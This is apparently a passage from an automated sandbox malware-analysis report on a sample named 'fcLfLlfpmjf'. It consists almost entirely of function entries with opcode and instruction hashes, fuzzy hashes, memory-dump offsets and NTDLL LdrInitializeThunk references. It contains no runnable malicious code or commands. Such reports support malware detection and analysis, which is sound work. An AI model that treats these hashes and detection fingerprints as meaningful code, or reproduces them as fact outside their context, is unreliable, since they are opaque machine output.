                                                                                    • Opcode ID: 643d709ada9c8fba68c45bdfe52b7096f7dfdb98646710c227c1375140100691
                                                                                    • Instruction ID: ed0214f5c3035050cbc0e0285c493e3799fd8acc32ef5d93ab3e16c75de0facc
                                                                                    • Opcode Fuzzy Hash: 643d709ada9c8fba68c45bdfe52b7096f7dfdb98646710c227c1375140100691
                                                                                    • Instruction Fuzzy Hash: 49E0E574E15208EFCB84DFA8D6416ACFBF8EF48300F14C0A9D81893390D6759A42CF84
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D22C28 Relevance: .0, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 052967ff25c028a92d4a4d9335521ab7454f688e8b94bf6821bb5d136e2dac32
                                                                                    • Instruction ID: a1e059afe3518b41eeaa94c23dff314bf39af5490dd2a9ab6e22838af081cef4
                                                                                    • Opcode Fuzzy Hash: 052967ff25c028a92d4a4d9335521ab7454f688e8b94bf6821bb5d136e2dac32
                                                                                    • Instruction Fuzzy Hash: 1BD05E363502248FC3009BB9F948E967BECEB48665B0540A6F60DCB221DA62EC009790
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D2EA4F Relevance: .0, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4ed6aa41a2139f0122b60cf9df6667a248b89528cb721ac38b1931b98b527975
                                                                                    • Instruction ID: 633483aa182633230274a261515853b7bbf1719949b6ff8326b6937440afcbb2
                                                                                    • Opcode Fuzzy Hash: 4ed6aa41a2139f0122b60cf9df6667a248b89528cb721ac38b1931b98b527975
                                                                                    • Instruction Fuzzy Hash: 25E012362201259FDF10DA68E548BEC73B1FB4432AF0000A4E009DB2A0DB38A986CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 052F9538 Relevance: .0, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1367536488.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_52f0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 23ca691fedd366fec5d49133222cfd584ed2481ef82465e6c09acf85a92e3c62
                                                                                    • Instruction ID: 4365f5813092ea2c264151e392f25f63f72b945d13d534c7661c495634932042
                                                                                    • Opcode Fuzzy Hash: 23ca691fedd366fec5d49133222cfd584ed2481ef82465e6c09acf85a92e3c62
                                                                                    • Instruction Fuzzy Hash: E0E0EC7492520DEFDB40DFA8E6457ACBBF8AB05205F1040F9990993381EA705A94DB45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D2F150 Relevance: .0, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9d887689ddedbf6241fb3811f47bafbdc0c0413fa20a274c7868235ebbdb7f32
                                                                                    • Instruction ID: f887aec636d6c40424a3476784550f23fc66f0fbfb9a0c571b5c46197d8f548f
                                                                                    • Opcode Fuzzy Hash: 9d887689ddedbf6241fb3811f47bafbdc0c0413fa20a274c7868235ebbdb7f32
                                                                                    • Instruction Fuzzy Hash: 08E07575D1020CEFCF40DFE4D5458DDBBB5EB48601F1081E6D806A2240EA705B559F85
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D24FA8 Relevance: .0, Instructions: 17COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2b1bb1b569956d0ab8f9e384920d6cd729a5571314f0293ca748bee2d0ebe4a7
                                                                                    • Instruction ID: fc3cc8a1e74964a5dae00b4b033ec01de2fc5efda34ee58d6f466ecf9154f9c2
                                                                                    • Opcode Fuzzy Hash: 2b1bb1b569956d0ab8f9e384920d6cd729a5571314f0293ca748bee2d0ebe4a7
                                                                                    • Instruction Fuzzy Hash: 0FD0A7323002281F9F0566E8841099A7BCBDF8E1503404466D6099F220DD61D81097D1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D23CE6 Relevance: .0, Instructions: 15COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7f77be7950d6e6ae33c3a490b8e918ed06423c7f6178737043c28eaf2e5685d4
                                                                                    • Instruction ID: 765910d0f0cb1ba175f889b6ae36ae8abfb48c32336b5476b7e3054511f915c8
                                                                                    • Opcode Fuzzy Hash: 7f77be7950d6e6ae33c3a490b8e918ed06423c7f6178737043c28eaf2e5685d4
                                                                                    • Instruction Fuzzy Hash: 71E0EC74644215CFD708DF60C594A6D7BF1BF48708F254498D401EB361CB79AD41CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D28888 Relevance: .0, Instructions: 15COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: de8bd424df47f7d741a5e9a369234dfd939bcbc7349068c23d66f49104f51789
                                                                                    • Instruction ID: f17ead6a70cc60681d2d4c95f56b3ac57e74a774e2fdc4e9c69ab0b7ed806924
                                                                                    • Opcode Fuzzy Hash: de8bd424df47f7d741a5e9a369234dfd939bcbc7349068c23d66f49104f51789
                                                                                    • Instruction Fuzzy Hash: 8BD09EB25246009FE384EF3DEA8975ABBE5E784205F44C939D549C2144EE309155CB56
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D22D80 Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9ab49afcbd8244ea57af09cdcf5e3fbde6ccd1ddd2d8ac965c838567fdcd1358
                                                                                    • Instruction ID: 4b46015da9fbe65534e2a253205e07aebed4c9400f81dc219baa1de660e234bd
                                                                                    • Opcode Fuzzy Hash: 9ab49afcbd8244ea57af09cdcf5e3fbde6ccd1ddd2d8ac965c838567fdcd1358
                                                                                    • Instruction Fuzzy Hash: 4CC080333001247FD50135C45C01D567B1DEB4D69CB14008DF3040F122D593EC1387D0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D22D7C Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 060fa9cd4f8466f3ce52431124c282d0eeddeeaf18bd959e757a47dff5eae119
                                                                                    • Instruction ID: 32efa553ee6d9ff4816875841ee60fbc888278732e66804e32af6dabee6db02f
                                                                                    • Opcode Fuzzy Hash: 060fa9cd4f8466f3ce52431124c282d0eeddeeaf18bd959e757a47dff5eae119
                                                                                    • Instruction Fuzzy Hash: 3AC01272300120BBE50135C469059557B19EB4D6A9F140099E3080F122D1A3981387D0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D24B10 Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fa47f941cbceec1cfbd56c6f0b2127394791853d2a8739cc16234764043c238e
                                                                                    • Instruction ID: 7d96e610eedd515efcbed446c379240a76a9748c8293f75ccc47701825895b0e
                                                                                    • Opcode Fuzzy Hash: fa47f941cbceec1cfbd56c6f0b2127394791853d2a8739cc16234764043c238e
                                                                                    • Instruction Fuzzy Hash: DFE04275A40219CFD710DF65D5A9BADBFB0EB08314F208459D816EB261DB74A804CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D26EC0 Relevance: .0, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3828cc5eff180fd3a0ac44cdb35ed5f1cd9b6577c1335f31a624ce24163bfeae
                                                                                    • Instruction ID: 644fe0e670151cb4348052e7da42ed82084d0e73dbfc8e4e3a13fd2dfcf0a03b
                                                                                    • Opcode Fuzzy Hash: 3828cc5eff180fd3a0ac44cdb35ed5f1cd9b6577c1335f31a624ce24163bfeae
                                                                                    • Instruction Fuzzy Hash: 71B09B3136423417D914319D74106AD76CD8785664F400067D50D97741CCC59C4103F9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D27A40 Relevance: .0, Instructions: 11COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d909efbc7adbf2c02321deec4b1e54ecb4cf049e4445bcf151e93fc3ef1ee962
                                                                                    • Instruction ID: ae5ca9dbf0fbb49752cdac55dd921811aa806388f460de62433a105fb3873f54
                                                                                    • Opcode Fuzzy Hash: d909efbc7adbf2c02321deec4b1e54ecb4cf049e4445bcf151e93fc3ef1ee962
                                                                                    • Instruction Fuzzy Hash: 2CC0928A82EAC90BE75606600AE30852F22A822008BD954E6C0818E497A2189A0F8362
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D24343 Relevance: .0, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 13679468d77ccb564d044e7d0880496caf13f25349739813f822d380ca09a4bc
                                                                                    • Instruction ID: 80512b625c03ab7cdeb5febe7ebfff75f3237af1889c4f17ad6c7203185a306e
                                                                                    • Opcode Fuzzy Hash: 13679468d77ccb564d044e7d0880496caf13f25349739813f822d380ca09a4bc
                                                                                    • Instruction Fuzzy Hash: 07B012E7C25F480FF70100202CE20C00B21E53100B3C51292C0818A5537058570F5131
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 052FBF04 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1367536488.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_52f0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aefb48e71fd961823ce9255775d95146d99e2bb865a0240f0c72df378eaca753
                                                                                    • Instruction ID: 90e7b1b8122a93f16c4711777341378d6a55b1f3efda25965a657c4422a6fe6a
                                                                                    • Opcode Fuzzy Hash: aefb48e71fd961823ce9255775d95146d99e2bb865a0240f0c72df378eaca753
                                                                                    • Instruction Fuzzy Hash: C0B092252B8200B3A500A360AA94A2B9112AFA2700B40E8627304240008AA44464962F
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D2457F Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ef21ab0916ffac5f2eb216c75a8d79d4d3f2c06b8b78dcc36cdb12436b2549de
                                                                                    • Instruction ID: 5929b79c7831d1163481b2def3e1d9ae5d47e48dfc3fd350dd8a49be792db20c
                                                                                    • Opcode Fuzzy Hash: ef21ab0916ffac5f2eb216c75a8d79d4d3f2c06b8b78dcc36cdb12436b2549de
                                                                                    • Instruction Fuzzy Hash: 12C04C3D4A6749AFDF01FBA9EC946893B21DA46E207109585D41485116D6E0D54B8F82
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D23D0E Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 18ae4d16b02bda8b1c3274f648b8bcfc6390897b4fbc02c3e1100c114a52ab50
                                                                                    • Instruction ID: a9a977a8dfa7251687c121bf0681d59abcda406b00fd4b191dd5cab742107f87
                                                                                    • Opcode Fuzzy Hash: 18ae4d16b02bda8b1c3274f648b8bcfc6390897b4fbc02c3e1100c114a52ab50
                                                                                    • Instruction Fuzzy Hash: 15B09238A08314CFD708DB30C8A085973B2BF8C29536988ACC001DB224CA39A882CA10
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D29860 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 77e5a90c832010c627aa6e956b240ddc22a97e62006660566aa0953fa4947f02
                                                                                    • Instruction ID: 2e81e9a42f235b2aad4ba9a7a71c02b2dc30236929d002f830a8b0e458094ed3
                                                                                    • Opcode Fuzzy Hash: 77e5a90c832010c627aa6e956b240ddc22a97e62006660566aa0953fa4947f02
                                                                                    • Instruction Fuzzy Hash: C7C09B9150525477FFB076B1C4453952A50AB1134CF9D2495D0844C247C75D91458326
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D24580 Relevance: .0, Instructions: 7COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0c73309570dee757bf556a468364bf43912293aa6d2bd1e6a0ce706badb6aef4
                                                                                    • Instruction ID: 131a44d4cc443c8a74fc98127c413d50be812d306308f7290816b1deda103884
                                                                                    • Opcode Fuzzy Hash: 0c73309570dee757bf556a468364bf43912293aa6d2bd1e6a0ce706badb6aef4
                                                                                    • Instruction Fuzzy Hash: 7FC04C3C4527059FEF10EF19F9487443770A745F25F00A190D00045119D7F49846CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D2E3B1 Relevance: .0, Instructions: 7COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 63d081aa621d4982f97c6acb76401a5733a17a6165a9d8f776641b79ba93d80c
                                                                                    • Instruction ID: b3ebcbbda352b467b2319307981fd299473f775437cc17e3a75d03348be523fc
                                                                                    • Opcode Fuzzy Hash: 63d081aa621d4982f97c6acb76401a5733a17a6165a9d8f776641b79ba93d80c
                                                                                    • Instruction Fuzzy Hash: 1EB0097851090A8BDB10DF39FBCCB063BF8E748205F598658A02182128DE6AAC14CA80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 04D2EB18 Relevance: 5.3, Strings: 4, Instructions: 322COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: # Vn^$3 Vn^$C Vn^$S Vn^
                                                                                    • API String ID: 0-343257227
                                                                                    • Opcode ID: 982b076a6fe8856d08076ef9e6f196726eb876bfc380456650c4ae42ae91fabe
                                                                                    • Instruction ID: 4a7a43daced8de95b205919511cea454621e1d0754874a8c6549eee74b40b5ff
                                                                                    • Opcode Fuzzy Hash: 982b076a6fe8856d08076ef9e6f196726eb876bfc380456650c4ae42ae91fabe
                                                                                    • Instruction Fuzzy Hash: 0EC1BF31A002198FEB14DFA9D58079EB7F2FF88314F18C5A9D409BB355DB71AE428B85
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:0.1%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:1
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 62331 1552b60 LdrInitializeThunk

                                                                                    Executed Functions

                                                                                    Function 01552C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 1552c0a-1552c0f 1 1552c11-1552c18 0->1 2 1552c1f-1552c26 LdrInitializeThunk 0->2
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(0156FD4F,000000FF,00000024,01606634,00000004,00000000,?,-00000018,7D810F61,?,?,01528B12,?,?,?,?), ref: 01552C24
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 05b80631f3484eb81599259fea08a4705200d8bff737d49eff4a92469a4e6fc0
                                                                                    • Instruction ID: 5760267de3333edd6d20e25d5483df40e34ab16ffcb5404d326692ae926ce68e
                                                                                    • Opcode Fuzzy Hash: 05b80631f3484eb81599259fea08a4705200d8bff737d49eff4a92469a4e6fc0
                                                                                    • Instruction Fuzzy Hash: 61B09B719015C5D5DB51E764460871F794477D0711F19C462D6030B41F4778C1D1E3B5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01552B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 4 1552b60-1552b6c LdrInitializeThunk
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(01580DBD,?,?,?,?,01574302), ref: 01552B6A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 7721fd2c83a9408983c063f0f6876968fca42f3f2c22d90d88f62310432644eb
                                                                                    • Instruction ID: e62c8e289c433a2b59773b08029637a605623fc047e3eccb080a8e290743bd8f
                                                                                    • Opcode Fuzzy Hash: 7721fd2c83a9408983c063f0f6876968fca42f3f2c22d90d88f62310432644eb
                                                                                    • Instruction Fuzzy Hash: B59002A12025000341057158441461A404EA7E0211B59C421E5014A90DC56589916265
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01552DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 7 1552df0-1552dfc LdrInitializeThunk
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(0158E73E,0000005A,015ED040,00000020,00000000,015ED040,00000080,01574A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0155AE00), ref: 01552DFA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: d719ef23410cb3da2252790e230c93b4e902a8f541c29a03e127f813efa6d8a9
                                                                                    • Instruction ID: 23a4a5f42e3282e9c80e27904049abbf83cae661eea65438f09298dc425973f7
                                                                                    • Opcode Fuzzy Hash: d719ef23410cb3da2252790e230c93b4e902a8f541c29a03e127f813efa6d8a9
                                                                                    • Instruction Fuzzy Hash: 1F90027120150413D1117158450470B004DA7D0251F99C812A4424A58DD6968A52A261
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01552C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 6 1552c70-1552c7c LdrInitializeThunk
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(0150FB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,01567BE5,00001000,00004000,000000FF,?,00000000), ref: 01552C7A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmpDownload File
